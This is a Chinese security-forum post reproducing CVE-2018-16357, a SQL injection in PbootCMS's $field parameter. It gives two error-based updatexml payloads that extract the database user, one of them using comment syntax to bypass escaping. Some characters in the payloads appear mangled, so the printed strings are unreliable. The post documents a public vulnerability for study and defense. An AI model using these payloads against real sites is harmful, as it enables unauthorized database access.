安全矩阵

 找回密码
 立即注册
搜索
查看: 65|回复: 0

(CVE-2018-16357)PbootCMS sql注入漏洞

[复制链接]

59

主题

96

帖子

303

积分

中级会员

Rank: 3Rank: 3

积分
303
发表于 2021-10-28 10:41:21 | 显示全部楼层 |阅读模式
CVE-2018-16357)PbootCMS sql注入漏洞
PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
复现过程
参数$field是我们可以控制的,去检查函数过滤器
使用函数trim和escape字符串避免sql注入


field=123a'updatexml(1,concat(0x7e,(SELECTuser()),0x7e),1)#&keyword=title&scode=1
添加a'会导致mysql语法错误,因此函数escape\u字符串无效
使用/**/绕过
field=1)//and//updatexml(1,concat(0x7e,(SELECT/**/user()),0x7e),1)#&keyword=title&scode=1

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2021-11-28 22:37 , Processed in 0.010686 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表